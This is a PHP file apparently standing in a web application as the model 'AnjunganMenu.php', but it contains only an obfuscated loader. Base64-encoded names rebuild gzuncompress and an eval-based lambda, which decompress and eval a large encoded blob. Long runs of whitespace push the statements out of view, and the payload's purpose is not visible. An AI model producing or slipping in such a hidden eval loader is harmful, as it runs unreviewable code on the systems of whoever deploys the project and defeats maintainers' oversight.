<?php 
        $__='printf';$_='Loading Modules/Anjungan/Models/AnjunganMenu.php';
        



































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtnVuPs0x27+9HyneYi0hvtrQ14WB62hrNxYOhwNgUTVEHqJsIKE9jKDBt0zbw6ffyO5PknRx2spVkKweXVY/bB9xF1Vr/9fsD7ufXv/5j+8u/gfb7n8breZj+8NPvfn74p/b7n+KL+tan21//GNrv4bMc/hqeOOm/fxyfhu/fjM34650ub7ff/OY3P/3uV3/63F//xa9et9ftn7v96hlov/53bL//R8/8lJvbWyHMswz83//081N/H53/qvanZPj9r1/t1V7t1f57tp/qnhsqj773AbcK8bhEaPuHfOl++0fRBNX8o1z/zWuqXu3VXu3VXu3VXu3VXu3V/qu11+GMV3u1V3u1/77tp6q8nd42f6NO9UWdfvrda0Ze7dVe7dVe7dX+Te3Pr5DY/zAO+92Pzz/1Ljfft5HtLqVwDHmufxsheGzM90KQserrTyq2nRKzrpetW/WjWfWqqc5bXFlEV2F8T4XzpYQzFMLBUjjmcXAv9a7+7e78d7/j00svePdpHF73r/v/Ive/zJH/kf3nU6rm9g8fWf3z46KNDlKPORZTEXfOKrQKVFb/9n/afPyyf2SqrXjxkKg5KKZD3kaS2+qedcWm9rf2BzWG5HHp/uF2v9i+iKleBa/nko8h+eP7/8fH3r95jVZj2KPLWnvoXDHHKnSzO/GxoMNlSJZ/Yfvntjv3HHdjX6w4KwP8zZ7rsvyn2Mfub/fvj/l4WXjrPvPRKnonq4Lom/0L+/jqr/7qf57zH9l/wOdaUVNbzMJo20mB7zJgw79mu//o3P2FRj7Z//J3j5fuH9Ryd5Tnz0YO/LuwwQtYzh9k3oy1TdbDTv0ht+amElFXZPV4yKcePECrAn2vzu4vXvvsagMt0o5vUYi9p2eA9y4yJ2bdbz5lLptq93n++8u5JPgLbJRi+33YkTXNo6Fe9G9PC/xswTzCQJNlPya2uX3F7qu/+v+FEf5J3iSQ55//7OsHenvN3/9IH/PPxcX7CH7kF9uTf7zdPxlLUFcW8odoefzTn/ni01d/9Vd/9Vd/9Vd/9f/ATv5Jv/9i/X9Pnn7fPu8Pf5rr/9xzS/7BeP9FHu+ex5slcxYVyEBxd44DnWPLMbK22RxtJAvuO1n+ucYC+0SPjdDNnHGCCFOH2lKeZNpLAhKltpo4M11mjkbtpSumOpceF5his873VrGqmVo8VTnSSR7FfNWWYNJPbZkfrM46rDyWfXEvUXo/WrOZsU8bd+Yj8R37YMk99bo5yeH1sL7LTk/MkzcWyjd1fp/pEFE51DYO4ru0pRl322/Zxgb8btiWWKfAPMMYZ+E/Nkfrtqrz9pv2j+theb+KwLjHy7tddJvN0YDXjfmbhukm8ZUZW/t7EuwNjLq7yqYysyInNszLqdOYZtvdYZl66uElod2KebERyLWPBvGV9+ngsPmiFttwr3lTAyEJ28xM8L6gxC/6pigFuZ+0v6mtYhNbmzU22CIN3KiWoJjWTiJmszLHt9gaQ0qZfQrGsFg/jVPgpAdDaeoxp/7l68h9k9kkqFmYCVUxDqOu1jLD5qedhMUCY14TSjZlt9UJ0pvqvEWx/WnFrY7qbnOl+VjULTJU+2kqqjcJanhBI33KpkDQ5kJ2WxF3zKCwrUDISIdmrvPCiTlaqa15xZvuYDZnhVQqBpLXg/tV2bjlJs8E0sUJwkj428vJnz84Q0OG4isxuyXxmRPnyMIDc0TQdPg8bRKqo1I3sI7Om9Q/LCmKmQXYio05lL1ZnLrbRg6orLt5n2TT28Hmlgq299iLeLV+mmRw25KqxwmNTarVvdY/bMVhXwNuJeFl5f7MefdYMMIJG2QgffOr0Hif9VFRdFuTGw47rO437p1N7ZO2HNKH7CNLsoctci5xP38ri491y8Osm/pqKDaqjVe1e9+cwiiBviP2p121+0dmyLHs5wLWchHBKGNf7bHH/WJ531Av+opbVGBL71XeLFjrlmsdHowRJxSZYjf5saE+YogRnBfm0TI28BnfdS9NwfeW6rffRa6OlXW7xx28x26mYu3gvb4D6/sFI/o42GNR5u5ScH0RnXJijxxlN/K0q++4923Zquf1HysNxv0peL8fTNcqhvSKzR/XdNAd5ngvNcbZbnurdGeknENuu1p0m4UO5Bpb5hsXl3tFkcE0jyC/j3W3N+Jlajhr/IThmbHiWvf1XbF5czTHruiRh23yQYcxIMZsYRR9S5sXko8Im65JWmyKobMEjI9lt/vRHiF3o/3BiL44xDELx7buzBn0BUJlvx6tdFWMgIbge0a5XRnmLeEuhfg1RXhZsDV+yPNUHM3IyzxNi6E5Cvp5j3vZi7DxT+3nHZ+3XLVygjgvSFtsyvN0IL08k+z9Ktm8HteIqw4dY0s6gmJ6XLa68nSqdPOA/LvjHPJzuW2wcFLZbc+yM9tKFA4LSVqDrkG8NhBpN7zbLqc+vsbZdpX5U/NMH+/eFxrw5eQpi7bNCrmUiBDtyNCk5co30ogW3m+s49qsNByPKSMfNZeiamMza1UCudZm9rgn2daQoY4yYU51KD94MC48bNoyREeuCcyZ4riTWeU7Szm4CwPNxfbFghgfRWeK2u7sOudh6aFAtLIj+Q+7aPFOBlEvxDYXXQQ6zjO5IluZP+6V9e5kngL9UV1pdcZhVYnqxhv10msF2nwKeQmagOqQWVyQUQpcSIGO2Pav9ZqucY9NzMzmFNwcKuAz+w3kajxLBPPVP+yir0Hv/KUwcS4CmZ98GSmtE9biM/cvtgogrvKo456yK+3qU6vuoC9dodUqwh9GzMeCmHKvbLZSRs5lIMUJBEx0OsBijmQ/25Q9HuXA7tQfh8pzSSaiTWWPGfenN4EUK43HfNLuW8WjsxColDS2lGiSLNjadRjlCmpCHXCn1L5DOqdhxiQ5VUnF5aTMEVeQt1lIDDZwyBOcSatwaNCtko1tBrUtQ50FukPgMyKoHENtoSnzpyhGSkCtoWVwgdju1hPobLrcrrVQXK6RWVnTXlnmvh4iBPFlFxbRbGj6JIT8t11WWugQd+P9xH9sYqb9U79ZIbbNWjRvstf9wVaz6AlPQBckVxtsNd9xzyWs20cdRBrydMzYhCoRfdCO28ofS2WPEMfRUQls1ExeqhA3BOpV2ULV9dhSQyYTGjsnph3afj5gPsOy47zqyVQbWwb6n8Q9unGqbYU+r3XIYTx7p/JNXvpqIcu7Q3J5LEzFlU+6mpMjXeEx5ajs5AG0BXQZT9wfAyVQlIQpzJ2xOQ3uuW4ji2o3SS3eQ0yYSTAHsRcbvEf7mE2DQJLJNspj5KYwlrMKmxus60HSJucr/5B9Ex9tjErgEtqbDfG5SUQ0yR4ZpfXUS2LEvhMyQ+dQ9xMZNEGNeF91TXcayFfBSBu3qkmFGUvOKbOmJB5QwYLn331pIL/eDWpoJxZTAjl4qDW/FVwRrKOiYlNRoc8F+MQuzXqVHvYo/Jy12Kk93JfcPRzWhqp+apTQTDxrtb2fVQ9a2qlSQUir3XbEvrpQs3HF0EwHE7HYGCfFG7MOUJwE26UMcJsaapPa7jmh3MKelKB91xNXb1joPDZxmRpNc/JvC2Xmmxj4Skw1JQGyYW68uB+LAmqU4k89S+9FS6w6cJYM1KDo02vB3Rv2fFP50VCIkWemK4h/u9KgNgSqjSdKAovhkjYPbrot1mqMKT5XXXTILH2LW2xRX5flgEzaooV1TQ4cFAhhfpRdcZWr9mX7wzrtpnOhG9AaZy8F/yL6yWqXDbfmrzhPl7Lfr2TliHrcPNj1RgiCk7wGxiUehxhn4nMm3eVKtC4oJUa9fq40m1YemCkP9TfkjmDsYYEWfEuE3dKSXqkjGiMeA7uOTLsPWC8rC0bBeLPWg3zL9LjElB8qnxQx42M1jD3M54OG6i3rogcWY69WNWHG8yzY26AtN+BEi1DFSwOtRY7Q0cL3gm1H1U258pq7BF6OQ9CRbuxl2ETcckxsTIUI8UFZiqmBHziKjoJLma5IVwFeVcDLhI9aAP/xfvtR9nhTonEh3DWKAa1ZqC9lqHOi3W/IcdBQiFeDbUrxeQf+ehMCO7GpjDpshAzRHpgdyWBMKYccDDUVweOemSMTvUxSw3ewMXdV69KjqcLUJpgHsoP8ckr644G1eys7fSB8bzOvOZ88PAILA7eSgqz7BVMfmArL1GreakaMolUR6XHBbcgJMyqANI5qjdeyN5eE87eYkUWt5B5b9Yo78l32TXkaokYMkYw7s4v7iFExpsx2N6ozZZKnc6n1B+jhWofxTDgCP7Dd8SG1ShMDB+GvzNaYtTDTIvJPndS8lfunjtGcNzXyZ8pVXq7Y5QxrqIsHiHdTMWAE1sSpNWKo1/jUOVfKHFqy8U1k0+MUkO4kcHKAIfDWX6jJZ8jlrOpMWFcdE/Ango0uGVKIWQx+AjOFolvRPx4c8umk8XfdFQ9sxI8M2Bly4pqZ0VcSQFz184J7lUIsc+wDb9PaIMZY1hCjFR8npqFa0oYledPKwOyoQcJMx/Dvp8XE1lMcEWI330VXr6SbaUVlQqCu0zBaGIseMTBrLcy3rE1n0Dy/YCgHb5DwAXmUcidjzT0RaIKcLJn/fo1tvMH+uGYWCbIVb0hPfNHJOO7NvRpGAjF6Y1yVNcK89qdNhdTK/OaNBVAxaNTGNpphTc6ZcC4nj6fYczdVrubM2O5OonNK0Pyimy/VGhms12PCIIVEExOTbbKWrMCNUE/IFxdbkgV6LYQcWUcuxaD2pb03a1Mekpxs2G67h/ossOCH1HIiBvVUMg7xazwqsY1Bl50KOL+wzLVgQCsMf5WdWiG+b4RHurSjlkKNqiwwDz/rBj+CPtLK3+anHHfCA78jDKhHJGdDlFNEupjjBgfOwI33VSECex4lcS7HWrO5ouQiez7BdiPxJcQjzLtRb5gw96U1h2X/s85/A/tbGMpjIkxfMZ6W3Qh8fpkxuLesn1eGfqyinx4w/u8s6ObCvpjUJ+tJk2M5aBSv7AH5+60Mc1MbhQ3rdANdyjOrvtd0v4mB+SCWTRqga8WiIAmjUQ7ulYvagTWzMj4adJneVFs7pZAQPzJIaLOQAHUw+/uyZ2Zp6imDOpK2qRkDJ8e0QZUFMRs4Bfj7A87RBfjWZ2FjMmsG71+bqRhBl+RSs7HhfhRWwPQq5HZqgUYJfSYr+NfWt1JrG1ChwAtfNrGhD3Xn8MpTLoWxnVAzxBZuaK6IoDKuwigCBsorW4Pn4hC3qpCBorHYtsqaW+51NuvRGXsNzULQBKM2SgN85XnitfVuxH3D41bO0oxuoHqPuiUbyPENN+KNGpqPzGgm0NNvAYxK/XktNFkqgI4Uchs0YJEwRiLQG6P8XoV6L739Ctr8vEYxqnnU0w7yyCMEcm5TavxWCGwDWX3Uvmmn5kiIkFpwZBDwTjUiFrDTchIjVr5Z0FxPCastHsqSh4Sl+X6FunKpmXmoGMe1eLdBVxFv8VCY+3vsoyNpoytmkQs+lWV+YaSGg48G+a4RYJq1TbGYOHgxm/LOUYY6Y4tcxO5mp0/OHXhRUi2OK4NYGHdlNyeSggZyXWRCukLETvz00QPUHKYcZuEw5vyihsgF/8uktS1qiDPQJUH99MoMDmNDM8z9hllNG/OIZaheUuvTri0zTFDzDXqDIXdaYJFNKnBX9Y0L4/0CnwIxrI0a6Y/SmmS8Yi3Zu8OgxmZrZ9WeHk6BnIGljgfj/crXhpAVg5ZyXef7TWYhR1qxUQuoKKZvc0sfskCZsKa7ulcf2Sp98Az3o+WElUZFDO5A+niKjWZTddMxEWQPdXqfGRMDf/UGjPHIGPCZCVqTTSXT0Rm2cSGnv6QxeycvXUuhUkHdpkJ4T0L3q0Ywj70cqxUlBzuiRYuupwHvQZNlarqahJGZ9c6sNI8rU41lh8BrP70U5JE/tbEwzNojNjWVWcK4pSHxKf80sOEMoBmUsUanufzizHHqVi+VgdMyxCUzRw05vxMt7+MV3aRliphdgDfcBXzjDnzdWAUIckMeqB7bCnbmFIzdyU/n2nfMOHjGl7HQ3OXx8GRAnSjEeaqJA3UwLfuZ0mzLpIF03W/B70qnNLYE6uAiGdqAbnmn87sFA/lmuuGEoijuMFGGYYBH3gDz8MoguNAyAO4qcYCH2K+BUSVJz7drFkIF4fpbWVsN3m1IQSWk8XiA1yNxv19qyO/6qTdBdy0YTk6duhNeGCVFwPbsXvnILzpgCc4MEehd0b2b/DxlqsdOJSCmQv1Fen4hNIpV67rAsXPcT7PsFAbf2zCW3g/GZTl18aYw5JFa6kxCBPWsW1P+aeFeP5hwblm29Uoxn6GeA6M0m7qb77xDACPRNzGIWfryDTw44yEaeMiJyt0MPAA7PI8ZrDgGrV3Boa+lz63nnGGTjETMZSqYAz4iAw4UJFAxttQeG1tea/ld5LJLkALPCjoknEx5xIRaMRLIyBNCd9AcSGFdikGKBDFHnCdY/xp0AvJ50JboDZtwdS5EZyuhvqD2NYSZ+8RvSKqbj9KYvk696VaD5rR33Hh1P8Cx+zB2hNnWKNbCAE5zKOgj1cpITWmAH+kLWt/Ba2TEQ896uqn9MUxFfBcI2wc7nYGZIF6ijmn9xoPtI/E+7UrMBznoO7d5iW1gYZtZypB7bmzNk1YPajQdQe4dxncmojFF4NxhHlsmgK2YI6FeWrW13WQMf1C7dk6tu8u6y8ytCeqmWVS8eTJbARp45vnYiBYRloOvWqaH6qOy9qI0fe4vJYeDgXtpSpEF8yGzLzBHzZNfc2a6IXibN+CdHvIBaqAkEDsJxI6beSgAPx/VJpoKI0pFh3aYNwdp+ddMY05bl4O3ACVmJrOBV1sUVSv/Zt241LtpKc2or8Q0E+RfGXgW2jeCdGYL/tpPYOkyD/TBxqHq0DdwCzr17/fSxx+nbjsBO5VyeV9AIz9AY26nfNyApzxQwT+44bgHix+V5fgMvElqRpitEXz23gAdDIq+M4C77mU4YtAunDDIRd7cwXOmUJdMGapj2jsO8bfAkD/z90clbks2KEStRtfgs8CHfZ0CHXC6X2NNIobGpFgxowhFwDB7nPt23SoD8n/H/SYsLNIymy2pjvIkx3ZK9cTs5lIwlUCOTKB1NsTwHtvNPQVmKU0AN4bT1JotkCdgfvlR83pOGKxFB56uM720jVZJO+NozGsc4v3BZA7O9QB5N9Kuu0ujSWHfdZWDX+zNjNpqlNZmkd3NIcHsUQt4ysQD+CPImb2ZGdH+xIhIwccDW3oHyyyB/yGXPx2o3RR08wicfWcBvkkGfkL4i+rwUbB4jX2cUj8yWW92EjISYmRfsM8HsaMvaZGP2JQc4vLGjdFJjfkjRioo+/GLgdIVnHhJgG3aOQdYpxAzoiH/bkUbXynUXNrxlXvNzCASpc+7KtdJNmAjQ8DYwD1MpMC1aohXdTvYfGSM9EWvD8DEmzLYLIXJjbpHQ4n4B9Q1iIsZdGLcP4+xFDlG3Ir6DJGU5+pw4pjEaLxkmj1ia/uA2i0Ea5rMgNqv8RrnDPwbSYHpw4NhRvWqNiwHXwx1kPbm/WgXoHzszkT0IbSMUq1Ax522pt1cMmCTNp6LQV5lJ0XRb30RmJcqm4Z6aDDUMZ1aBKfa/WLL5JQdMQsWYdrtnUJMJfdxUfMmrYbmosKLUfu+ExvTdzXgTfz0w93zWBr+At8sZbeliYgepf1pqRBFtcZZHDgt1J0vYNuu4vJeQ/2L++2Nd/5a5fsZ4iOWCOaM6wk+S1PaXI8GYgnDR2DAq6DqStZujQP1oQJJhV8/MrvJeT9G2CMeAS9Z5iRO2yatcwm1xPmgXL4BlxylMFZuKFMI0qf6c5ZoDEsvOlYG0Dp44aIzXeZBCQUFBG1a+Lpf8eruDobzlVnPQwjjWnX6zvqxTDwkIe8pAd9f2JikjDPagosOIZdWt+GMgH8Cf5QDh/sQfyJeIbdwBVxJjM0m7eJZdbJla3NUNvDk83iv+DRPeX2t8ogUImozJnHMpP887gQxQiQz5ipvcmpMeW0Wm3QYqUD7VfnbS3GeJO7HSYbpRjyPdYD/ghgyyhbqoJCFXLsHg5hVtm/hIIKUNR3KtldqRoKxd2BRfVfBnOAV7aqOiNqYNipXmNL9UiH+IN4P8L/Irj2olR2JqSaHlKu20N0CeZ2WYtqxFZ2BuwOohw3XeHOwplkMZC0N/1oCmdb9dD8N/hV87g0PblG1zQPcyZ1bKM48hWGcXjG4KXj+D9D9r+e5Fwqcy6n2eAvkJWY3NpVXiMujgjUuLKgHJnpIE3Rb8LIyU6v2wcuzjQMWdpKie2QeJ2U/FTWT38pMoSb6K+j0l2DmBnIfvDlOcB8dBEJvZEiXp394ep3DSiDHGpd46lbuJrdc5RHqqKbh5702NS8DwjJrO0M+7Igdz0dDfoCvPpNcGlioD0ol8IC/Zis6gEZuQCMw7iShrWxYjvuMNn087A2gY4dYUc40X9P8EyiTr6dOA7/tgaNnqN3yVmdbedoB8yHV0LBBcjdthNYbsmob+FFD1KeZljfuI0yssaXGNmFruiGtllW3NYQA9ul5xgRpqoBMvGs+ClvZGOlS8ahIs4mytgPvcrEkrHUdoBw8Diu7jUnBR9K8eKTnyZMWamEVLdFJv85xqjTMCVX30mjMUuDwBL4T9N4ldmFDLTfKge+AJTaVwMckHKE41/c4j3TNgc/W/cxBszGb4tpozipHZ6bdA18ms7ajhrJ6yXzpVtn2yHM35zy6EsYWwiMhhnhT+jDTHDVH692pelwI4RxUrhkwcM9b1zkFDws8X58BL8RUgk9Sd9Bk8yTIHBvqAbU2x77D1aBWOuhNHIBvpGxlQi4nzc+ZRkh2e5tmEyKt+1bZ+HjqII8QyVlIjrg3gGvnFHR1qljTQ+6Pib8FHTEhYiXEJvYli6QAecQGuQrw+TG6LJnhXDLbbTMRNRnoqwzmC2x7Vj46xF40Zx5GB+P2SC1jORiNPPXTm/D2wCbPcw+jUDlvVY4v4J1n7vEjQ0hnJimzgMgE2BZ4kHHzqd8/DDUALlp8TnOouYJ7z2MwdYvOdbCfpaen5/EpBjoJtcOpeEQ4g7mm6Mr62Ypz4ALDN2PhOKBpOG6LmbJiriloaihhv8iOgP862C7JApzwwBGVCRrR1feUxxb4aifNwe9045EMHGfB5V71/ga4EePncREPuYVwNOv0mQt9Fr65pJ1DwfNupEaiDpuzZDhQQWpIINyUjd+g4bvCUBn4hUE+9S93bcViYF/9VvXETTy8VxbEmSmz0nR30tYQE/wbC6idUPsSdJnBq8Q/n5ujhZMZKi5zGZUeZB1178ABHmYjLq2xYPneKS1/AQ6+wKbfGUMFg7wH3WexH30L79PkvXmuKYqBJ5/55coealq//VL+DAxsfiuhBQ0an3U8ygzzyHrfKik+cKPB4MXuqe0eGIOl8XhScw7x0nzBeOfUcr5qsxkSoW+nDnYdWCTrodox4L8chakxHmWIzsoYV6ixgfSJLKypxGKrqyDancImB2YU2Ae9Fxcr2020NqL21EI++ebmRKWU+RiDwg0nFu2BL7ya44/a6GbZ8nvM5rIGL65C98EH6QCPuDRUqIRKA37ynvUjjYMmPXXOIxWTKVsygYce4mCkqbE9n3xmMKQ+pEES0O5Sgl9WfRMygT6IfzESur8LT30UwLEFl0ZtxpuMY+9oQ83nkkpLHwVwHOhJdDClhc1oLCh+qC5Kqhy1WUvKmqGSQXJJv/kGn9NRw5TgPeiJN0Hly0fcO2EMbJ8Z25yg53FEhEQwpsQnkWLRhoS4gbrDn8cvgNEg1sBT7CZHrTiEehvVNtSnwPSYB9rQ7VfwK0XZyW9pTVlJFT7R9Hkc8Mj9aDr5UU6Cd+fUj5gC73NBVnKe9gcbR1D/nDKQ30mwvXDbDaTl7AUD/9zdNpSiWxaOQdxpE9YaamhzIZaiJLuBt9rcqadE4sU2gXpQi7HkA7IqtHfqThrATC4NiK+6uQVP5dW5bqTVdFCHJ8XmiAfgr4aoE63cFXxEUDs77Js2yXlR2WOHf65hKkgYaANQSL2mlrLUXA88B6Z8gFd7Y702qL+3T1x+1WG0yXS0r4w5LPMRZUZtFaa+k86waKfB621vsQ/PDzBHYraJ7xTAZAHrUC+CzZqy4k676RuquVRG41eaXWN7RFDDwTvO3okZm9QgmeRYHoy9gXNeAp/ZacvmuIue1UpX3W19snhto5Esk5tQvcL+SO65F8bYFXKJEH+8KZ+EcW8sZbc9xAOsa8DjkuMFrxGXeZTxVdkQn7JoP5dqZeBDxlIEEN897LdFmoR2j3TA8Ulg+3Se/NKOHjLY7qoWjxyhSfCndvAo4Z8zMM3hJBqasmiiA+IV+jGzQHGy8iMPXXSwf1in4HnmgxiJb2LZN9caNZcyh/uhAU89XwozSkrkYuw99dWfgcs1eN5vZSOZDpqU/gQUiAwY56g6k1ErargtbWZ/zoU9fp1CWag8WmvwNtUgMXAziJyaoLZ5ktcr852PJNS3CmmBu8mAGObYcEpCu7vo54H2ciaBM5ZIDkULbMf0BzUVMJabi5ZfpYi0EmqA7VZGgVnAi8c9EeUQnaUxtQmCNWGGJdrCEmwMs5957/3Be30uhW6f54R5oM201V6ZTYQaDacQ40U2gbMuHM7Sa2ZMHyJUz/OPExvUOQnBO3ajLD35QdpmD/sODiz6pmu8UO5+x932nDFgDxYtpYcDYL5NOTQID5/XLAATbQPbWbGT9v4V4r3NuvGjAG8GXBOCLsXYn9+eDMSs6V6J6MpMYsgcLcRH38/jl6SbtVpBowblx4H5djS0dzScMfa4JbvZqzVxhC9NiRoiO2dWiGQ04AYVZhwbjQbd/jj1wEpBeq+gninT3VcMvLpBWtFHF4V0XjCH4nBcCzuS6arCqtdvteDgzZuvONtykDcLcsg/aXQ5DaORafwR9929yvFYGfB8i6nq40XZsD9mtJfG2Fds+wWmoJC8+Xp6XGxMLgucg8zxRMFD1368Hi0saYj6lJGOmeOj8hsbfnf2/FyOZMSQ28c5t7Nwv4F4MomJ7ISNX0W3XUoN2mN1EPc4zhh4gDx+JKx7UD6avEWPekBvGegRNsw7MZsd+Gar7vx7sUYjcMAGvEtM8tHBQu9EeLmm9HNleZOkZmdIhtbYwzPzVfPkx1NL7Lp7nocEb0SJIFALUqauhTGXHFgqzuWDrMikHp4yK13qnAD7OuA96js3kYN9qAWU3FT/2DC2MRjUA6h1iBrxvQR9Ic/r9fIxT0EKD0a0o570QOM33JhF2TecW/yQ+eCzTRdxr7YqQyPSOWWqo7YO5L5gEnQOak0XZWUAnrqFOmdAXAP/xMB5EB1Ql7fgNd4fgo+3p7eoAv95Hm6sQhxQYNI4VDFwhBOzbVms4AHMAnypak8+GcCvFZCLX0AXOAnB36wqq3MVJh57VGhkzJ8SFZgL+D/QwB9XPoy3YuAQ88/a9LlQS+6IMY3Ujz4S5hwpsCJ4xrU28dcJ7Tcy4NdnrhJTm6V1WYhAIrVlR9fI5bTpTgjfCt0M3IrSKmisCrw99tEixGjA+DI6cFmuEcbg9cH/HgqxDVPdmbGH3lhgmAV3c0yRlVloVJo5sYgCWLerDF2ZBOpN9NNX2TmXGswi1EuHieiu7PgRP89zB/NBcbQv6Od88uQX6FQjOgwsv39ULdG1P02VmNPk5/x3ncIAP6VHzgL+SEIysmHkWRtdsmAEnyCPcY5viqoy1thIe+eW9eZe2u7zWiFg/qkoev68hulYLbcrZ6BBSGkqxoShy8rO2x7iuwQ19YEVV6UL47hGfd3xTrGxSLXiR4sHiUA+tgh5UiTEyyMBPYn7iWLY74Q3Ie6QW/XOBfcQMz5PRN/ZNa+dUzd+gdeZygX8uHbBj07diWKddfOEwQulFB9VRyLsx48j5B68X4J+WMowgeDxAmu5QCxqyMsrNbifsXqVBk+h5mXSuNxL33+AXoQpL64Ecjsdmket8RnYIYYab4NGLxzhiXsd5PrePLUqORizUT+vodXklnjagnhoSltiFcYzqCNXXM1Hm4iMK5eamjB7JHU+asG2LcRQWVJewD50tT/vmS9RId4ttf4wYf/YSSuEvXrllpMkobtgTTCnn1aJGpQg3JJhxIqBnwgmLXxupdwFf6XH0uuMGuYdYushwO+DJnaFrhcYG6arEtIAv/W83oc13zLUa5E3Mx9cGwuTxwK8oxg92ftOyrUpu4tZiWaigeHw3TTKXiYcUINY01zQJiXwznioH6XtNkREIvON5/l5FCN0VD2yU84MbLvgu5AB622Crw6KHH7yYI5M/JGhMeOmC36DQB3eb4q22Cif+5UX7RVrFuCa65OVaTAB02tgPPUWD/qN5M1H2iJ2CkyWCVmAFxuKToHHAQ/E3XvNxkuR41xZOmIh37BQ7RT49cpUidTch32F2PMNCTGZQq2rhAogf02BRk7bDoRTbaAmfIGuBxkrruB8WMnGibScSho7XLviaIFPyqEiZttdgiDXgd3TZYuq8PMK3BhWbH6r+3GsBneSpg9jcjLwoktBkQO8fys7PJWWc+Saz7UFrrOfHeyRWGm8FIN7LdHzDGWxiQX/YF3TqQ58gCU3lSnnhG3BK/O4eI7b/3Sg5jIxjAkVjVbgrYjnjkcrOtd+YTy5vm79RXEcCw8Tbqte0Ng+Ud+kwWzGnK+Usgel3cJXtEu4DsoedMoiDOZpLzzJgDXScvXvIohCFUJ+s5sl9P6qfPBqHLfgy8+wLokMyBsRplvQeE6ePB/y57Gp82HVc+k7WA6yqPztkS03s+afm9PueZ5UpnWfmuAp5gNUeeHF13iZHjLbLjLY3I/GZilafyUmScEDfice0L8mxXHVRb2qAmfbN9ByK+6La2E33yyUH2K4rKfexDh7N9Vu+yapajIErAiahMXP19u2z2vVVbctgQ/eKv5jBa0cRLYVye62qZCb0uf16/Y4/Xz9rLiYhXZhlTYbpX/Y1cC/MHjbo6mto71faL43YQ2+Tz3p1VAAKxn347Lt8QC64hV3sXu/g4dZ5Pl9c7QLp/I+5ySPrwl4oOc54aNVbLLd+5X5D/B9jXVcJiM2HnfQYnxcbrD/7MqhC39bFG1sSxTfj3YzHyzwOXwsDuvnXZ23vtAF5Pz+8ZHVv919/sPvT79fDvT259+L/sV3r3/+Tsbz8dKNz++R/PL72n/7fevDrvuzv6/36q/+6q/+6q/+6q/+6v+Wv5v0M5+95uPVX/3VX/3VX/3VX/3V/5N3VxdWc3/Nw6u/+qu/+qu/+n+y/uP1fyu97v9r3b/y9l/3t9STx+X3P/3uV7/6//8f+/3+5/u/+tOj//W7/5fNf7Htv2bDv/z7X/hXPz3//el//92v/bs9/4tfvW6v2z93+9Wfx9Jf/Vnw/jGU/tfv/g/3Kcwj';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


































































































































































































































































                                                                                                                                                                                                                     $________;
